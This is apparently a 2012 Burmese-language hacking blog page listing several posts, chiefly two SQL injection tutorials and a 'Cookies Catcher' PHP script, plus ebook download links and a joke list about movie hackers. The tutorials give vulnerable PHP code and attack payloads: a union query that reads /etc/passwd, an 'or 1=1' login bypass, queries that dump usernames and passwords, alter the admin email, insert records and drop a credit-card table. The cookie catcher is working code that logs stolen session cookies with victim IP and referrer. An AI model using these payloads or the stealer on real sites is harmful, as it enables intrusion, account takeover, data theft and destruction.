ရုပ်ရှင်တွေထဲက Hacker တွေဟာ ဘယ်တော့မှာ Mouse မသုံးပါဘူး တစ်ဖျောက်ဖျောက် Key Board ရိုက်တယ် ပြီးတာနဲ့ ဗြုန်းဆို Enter ကြီး ခေါက်လိုက်ရော ဟော ပြီးရင် ထပ်ရိုက်ပြန်ပြီ ပြီးရင် ခေါက်ပြန်ပြီ :-D
၎.Watch the Bar
Hack နေချိန်မှာ Process Bar လေး တဖြည်းဖြည်းချင်းတက်လာပါ ပြီးရင် Enter ကြီးး ၀ုန်းခနဲခေါက်ပြီး Hack လို့ပြီးသွားလေသည် :-D
၅.Password Guessing
Target ရဲ့ Password ကို Hack ချင်ရင် ဘာမှမသုံးပါနဲ့ Guessing တစ်ခုနဲ့တင် အဆင်ပြေသွားပါပြီ Guessing ဆိုတာတောင် လွယ်လွယ်ကူကူပဲသုံးခေါက်လောက်ဆို ၀င်ပါ့စေ :-D
၆.Hack with HTML
Hack နေချိန်မှာ HTML Code တွေ Monitor မှာ တသီကြီးတက်နေပါစေ :-D Html နဲ့ ရုပ်ရှင်ထဲမှာ Hack လို့ရပါတယ်
Mr.Cracker က ပို့စ်ကို ကွန့်ပြီး ရေးတာပါ ရှေ့က ပြောသလိုပဲ ပြောစေ ပျက်စေ ကလက်စေ သက်သက်ပါ ကျေးဇူးတင်ပါတယ်


source from ghostarea.net
Read More ->>

Saturday, May 26, 2012

2 Sql injection tutorials By Ghost Area


This Post is copied from www.ghostarea.net


SQL Injection Ultimate Tutorial

SQL Injection ဆိုတာ MySql DataBase ထဲက User Data တွေကို Inject လုပ်နိုင်တဲ့ Vulnerability တစ်ခုပါ SQL Injection အကြောင်းမပြောခင် MySQL DataBase ဆိုတာ ဘာ SQL ဆိုတာ ဘာ ဆိုတာအရင်ကြည့်ရအောင်
DataBase ဆိုတာကတော့ ရှင်းပါတယ် Data အစုအဝေးပေါ့
SQL ဆိုတာကတော့ Structure Query Language လို့ခေါ်တဲ့ Language တစ်ခုဖြစ်ပြီး Data တွေကို သိမ်းဆည်ဖို့ စီစဉ်ဖို့ အထူးပြုရေးဆွဲထားသော Language တစ်ခုဖြစ်ပါတယ် ။
MySql ဆိုတာကတော့ ခုနက SQL Language ကို အသုံးပြုပြီး ရေးသားထားသော နာမည်ကျော် DataBase Management System တွေထဲက နာမည်အကြီးဆုံး Open Source DataBase Management System တစ်ခုဖြစ်ပါတယ်
MySql မှာ Data တွေကို Table များဖြင့် ထားရှိပါတယ် Tabel ထဲကမှ Column , Roll ဆိုပြီး ထပ်ခွဲထားပါသေးတယ် ဥပမာ

No. First Name Second Name
1 Negative Thunder
2 Ghost Area
3 John Smith

ဆိုပြီး ဒီလိုထားပါတယ် အဲ့ဒီ့ Tabel နာမည်ကို Hacktivism လို့ထားရအောင်
Query ဆိုတာကတော့ အဲ့ဒီ့ Table ထဲက Data တွေကို တောင်းခံတဲ့ Request တွေဖြစ်ပါတယ် Select* ဆိုတာနဲ့စပြီး Sql Language ရဲ့ အဓိက Operation တစ်ခုဖြစ်ပါတယ် ဥပမာ Query တစ်ကြောင်းကို ကြည့်ရအောင်
SELECT * FROM Hacktivism WHERE Second_Name=’Thunder’;
ဒီလို Query ရေးလိုက်ရင် Negative Thunder ရဲ့ Data တွေ လက်ခံရရှိပါလိမ့်မယ် ။ ဒါဆိုရင်တော့ SQL နဲ့ Query တွေအကြောင်း နည်းနည်းသိသွားလောက်ပါပြီ
ဒါဆို SQL Injection အကြောင်း ဆက်ရအောင် 
SQL Injection ဆိုတာ User Input ကို ကောင်းစွာ Filter လုပ်မထားသော Developer ရဲ့ အမှားက တစ်ဆင့် User Data တွေကို Inject လုပ်ခြင်းပါ
ပထမဆုံး Vuln ဖြစ်ပုံ တွေနဲ့ Exploit Code နမူနာနဲ့ Attacking လုပ်ပုံတွေကို တစ်ချက်ကြည့်ရအောင် 
exploit.php ရဲ့ Code ကလေးတစ်ချက်ကြည့်ရအောင်
<?php
$id = $_GET['id'];
$result = mysql_query( “SELECT name FROM members WHERE id = ‘$id’”);
?>

ကြည့်လိုက်ရင် သိသာပါတယ် User Input တစ်ခုဖြစ်တဲ့ id ကို Filter လုပ်ထားခြင်းမရှိပါ ဒီတော့ 
http://site.com/exploit.php?id=1+union+all+select+1,null,load_file(‘e tc/passwd’),4–
ဆိုပြီး Browser က တစ်ဆင့် Request တောင်းလိုက်ရင် ect/passwd Directory က passwrd File တက်လာပါ့မယ် ဒါကို Out File Injection လို့လည်း ခေါ်ပါသေးတယ် ( ခုနက Request မှာသုံးသွားတဲ့ union ဆိုတာကတော့ select statement တစ်ခုထက်ပိုပြီး သုံးချင်တဲ့အခါမှာသုံးပါတယ် , load_file ဆိုတာကတော့ Server ထဲက File ကို Load လုပ်လိုက်တာပါ )
ဒုတိယ တစ်မျိုးကြည့်ရအောင်ပါ .

ဒီတစ်ခေါက်တော့ exploit2.php ရဲ့ Code ပေါ့
$postsender = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘$postsender’ AND password = ‘$postpass’”)
or die(“<p>” . mysql_error() . “</p>\n”);


သူ့မှာလည်း Variable တွေကို သေချာဂရုမစိုက်ထားပြန်ဘူး ဒီတစ်ခါတော့
username:a or 1=1–
password:blank


ဒီလို Inject လုပ်လိုက်တဲ့အခါမှာ သွားတဲ့ Sql Query က ဒီလိုဖြစ်သွားပါလိမ့်မယ်
SELECT USER from database WHERE
username=’a’ or 1=1


ဒီလိုဆို 1=1 က true or true ဖြစ်ပြီး User Access ကိုလက်ခံသွားပါလိမ့်မယ်...


SQLI Part 2 : Attacking Examples

Part 1 : မှာတော့ SQL ဆိုတာဘာ MySQL ဆိုတာ ဘာ Query တွေအကြောင်း နဲ့ Attacking Example နှစ်ခုကို ရေးခဲ့ပါတယ် ဒီနေ့တော့ အခြားသော Attacking Example တွေနဲ့ Exploit တွေကို ဆက်ပါ့မယ် ။
ဒီ Tutorial မှာတော့ URL Bar မှာမဟုတ်ပဲ User Input ထည့်ခွင့်ရသော နေရာမှန်သမျှ မှာ Inject လုပ်မယ့် Attacking Mode တွေကို Example တွေနဲ့ ပြောပြပါ့မယ် ။ ဥပမာ Search Box လိုနေရာမျိုး Email Address Input လုပ်ရတဲ့နေရာလိုမျိုးမှာပေါ့
Shopping Site တစ်ခုရဲ့ Search Form ဆိုပါစို့ အဲ့ဒီ့ Search Form ဟာ ဈေးဝယ်တဲ့ User တွေ ၀ယ်လို့တဲ့ကုန်ပစ္စည်းကို ရှာဖွေဖို့လုပ်ထားတာပါ ဒါပေမယ့် အဲ့ဒီ့ Search Form ဟာ Filter ခံဖို့ လွတ်နေပါတယ် ဥပမာ ဒီလိုပေါ့
if (txtFilter.Text.Length > 0)(
strSQL += ” WHERE ProductName Like ‘” + txtFilter.Text + ‘”;)

အဲ့ဒါဆိုရင် Attacker က
milk’ UNION Select 0, username,password 0 from users –

ဒီလို Query ရေးလိုက်ရင် ( milk ဆိုတာ Example Item ပါ ) User Name Password တွေ တက်လာပါလိမ့်မယ် ။


 

အဲ့ဒီလိုပဲအခြားသော Attack အနေနဲ့
4.Updating Table
ဒီတစ်ခါတော့ DataBase Table ကြီးကို Update လုပ်ပစ်ပါ့မယ် ဥပမာ.
milk’ ; UPDATE site_database SET site_email = ‘admin@site.com’ WHERE email =’attacker@email.com; –
ဒါကတော့ Example ပဲပြတာပါ site_email က Website Admin Mail ကို Attacker မေးလ်ကို ပြောင်းပစ်တဲ့ Example ပါ
အဲ့ဒီလို Inject လုပ်ရင် Query မှာ
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email = ‘milk’ ; UPDATE site_database SET site_email = ‘admin@site.com’ WHERE email =’attacker@email.com; –
ဒီလို Request ဖြစ်သွားတာကြောင့် Table Update ဖြစ်သွားပါတယ်
5.Adding New Record
ဒီတစ်ခါတော့ DataBase မှာ Record အသစ်ထည့်မှာပါ
milk’;INSERT INTO site_customers (‘site-email’,site-password’,'site-login_id’,site-lastname’) VALUES (‘attcker@email.com’,'hello’,'attacker’,'hacking attacker’);–
site_customer ထဲကို Attacker ဟာ သူ့ရဲ့ Record တွေထည့်လိုက်တဲ့ Injecting Code ပါ အဲ့ဒီလို Inject လုပ်လိုက်ရင် Query မှ
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’;INSERT INTO site_customers (‘site-email’,site-password’,'site-login_id’,site-lastname’) VALUES (‘attcker@email.com’,'hello’,'attacker’,'hacking attacker’);–
ဖြစ်ပြီး Record တစ်ခု ထပ်ထည့်ပြီးသားဖြစ်သွားပါလိမ့်မယ် ။
6.Identifying Table
ဒီတစ်ခါတော့ Table တက်လာအောင်လုပ်ကြည့်ရအောင် ။
milk’ AND 1=(SELECT COUNT(*) FROM mytable); –

ဒီ Code ကိုသာ Inject လုပ်မယ်ဆိုရင် Query မှာ
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’ AND 1=(SELECT COUNT(*) FROM mytable); –
လို့ Request လုပ်ပြီး Table တွေတက်လာပါလိမ့်မယ်
7.Deleting Table
ဒီတစ်ခါတော့ Tabel ကို Delete လုပ်မှာပါ
milk’DROP TABLE Creditcard; –

ဒီ Code ကိုသာ Inject လုပ်လိုက်ရင် SQL Query က
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’DROP TABLE Creditcard; –

လို့ Request လုပ်သွားပြီး Table ကို Delete လုပ်သွားပါ့မယ်

 

Read More ->>

Saturday, May 12, 2012

About Linux and Ubuntu



Linux အကြောင်းနဲ့ Ubuntu အကြောင်းစာဆောင်အတိုလေးပါ......။ဖတ်ကြည့်တော့သမိုင်းကြောင်းကအစ ပြည့်
ပြည့် စုံစုံထည့်သွင်းရေးသာထားပါတယ်.....။ဗဟုသုတရချင်သူတွေအတွက် အသ်ပညာတိုးစေမယ့် စာအုပ်
လေးတစ်အုပ်ဖြစ်ပါတယ်.........။

သန်ဒါရေးသားထားတာပါ.....။
MHF မှရရှိပါတယ်.......။

Download Links
http://ghostarea.net/wp-content/uploads/2012/04/ubuntu.pdf
http://www.ziddu.com/download/19376217/ubuntu.rar.html
Read More ->>

Friday, May 11, 2012

SQL Iɴᴊᴇᴄᴛɪᴏɴ Eɴᴄʏᴄʟᴏᴘᴇᴅɪᴄ - Hᴏᴡ ᴛᴏ Aᴛᴛᴀᴄᴋ & Dᴇғᴇɴᴅ







SQL Iɴᴊᴇᴄᴛɪᴏɴ Eɴᴄʏᴄʟᴏᴘᴇᴅɪᴄ - Hᴏᴡ ᴛᴏ Aᴛᴛᴀᴄᴋ & Dᴇғᴇɴᴅ - Dɪʀᴇᴄᴛ ʟɪɴᴋ
SQL injection အကြောင်းအပြည့်စုံ ဆုံးစာအုပ်ဖြစ်ပါလိမ့်မယ်..။ကျွန်တော်တော့ဖတ်ကြည့်ပြီး အရမ်းကောင်းတယ်လို့ထင်ပါတယ်....။ဖတ်ချင်တဲ့သူတွေအတွက်
ပြန်လည်ဝေမျှပေးတာပါ....။


Download Link


 
Thank To:Z3RO C00L (HF)
Read More ->>

Friday, May 4, 2012

Cookies Catchers



ဒီနေ့တော့ Cookies Catcher တွေအကြောင်းပြောရအောင်.Cookies Catcher ဆိုတာ Cookies တွေကို Capture လုပ်ဖို့ လုပ်ထားတဲ့ PHP Script ပါ။ ( Cookies ဆိုတာတော့အထူးပြောဖို့လိုမယ်မထင်ပါဘူး Browser တွေမှာ User Login တွေ Password တွေကို သိမ်းထားတဲ့ Special Things တွေပေါ့ ) ကဲ အခု Cookies Catcher တစ်ခုအကြောင်းကြည့်ရအောင်.
Code
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Website: '.$referer.'
');
fclose($fp);
header (\"javascript:history.back()\");
?>

တစ်ခုချင်းစီကိုကြည့်ရအောင်ဗျာ။
Code
$cookie = $_GET['cookie'];

ဒါကတော့ Get Method နဲ့ Cookie ကိုယူပါတယ်
Code
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$referer=$_SERVER['HTTP_REFERER'];


REMOTE_ADDR ကတော့ Victim ရဲ့ IP ပါ
date
ကတော့ Cookies ယူတဲ့ နေ့ပါ
HTTP_REFERER
ကတော့ Cookies သိမ်းခံရတဲ့ Address ပါ ( ဥပမာ Mail.google.com ပေါ့ ) XD
Code
$fp = fopen('cookies.html' 'a');
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Website: ‘.$referer.’
’);
fclose($fp);

ဒီနေရာလေးကတော့ နည်းနည်းရှုပ်သွားပါတယ် ။ ပထမဆုံး cookies.html ဆိုတဲ့ File ကိုဖွင့်ပါတယ် ပြီးတာနဲ့ အဲ့ဒီ့ဖိုင်ထဲမှာ Cookies ကိုသွား Write ပါတယ် ။ ခုန အထက်က ရေးထားတဲ့ IP , Date , Referer တွေရောပေါ့ ပြီးတာနဲ့ cookies.html ကို ပိတ်လိုက်ပါတယ်
Code
header (\"javascript:history.back()\");
နောက်ဆုံးအကြောင်းအနေနဲ့တော့ User ကို Cookies Catcher ထဲကိုရောက်ပြီး Catcher က Cookies တွေသိမ်းအပြီး ဘယ်ကို ပြန်ပို့မယ်ဆိုတာပါ အခုတော့ ၀င်ခဲ့တဲ့နောက်တစ်နေရာကိုပြန်ပို့ထားပါတယ် (ဥပမာ User က www.site.com/index.php?=shop.phpက လာတယ် အဲ့မှာ Cookies Catcher ကိုဝင်မိသွားတယ် www.target.com/cookiescatcher.phpပေါ့ Cookies Catcher ကလည်း cookies.html မှာ Cookies တွေသိမ်းတယ် ရောက်သွားတာနဲ့ Cookies သိမ်းသွားတာကို User မသိလိုက်ပါ ပြီးမှ သိမ်းပြီးမှ User ကိုတစ်နေရာရာပြန်ပို့လိုက်ပါတယ် ဥပမာ index.php ကိုပဲပေါ့ ) 
ကဲ ဒီလောက်ဆို အဆင်ပြေမယ်ထင်ပါတယ် 
ဒီလိုမျိုး တခြားတစ်ယောက်ရေးထားတာ ဖတ်ဖူးလို့ သူ့ဟာကိုရှာမရတာနဲ့ ကိုယ်တိုင်စမ်းတ၀ါးဝါးရေးလိုက်ရပါတယ်  :-D 

source from ghostarea.net
Read More ->>

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology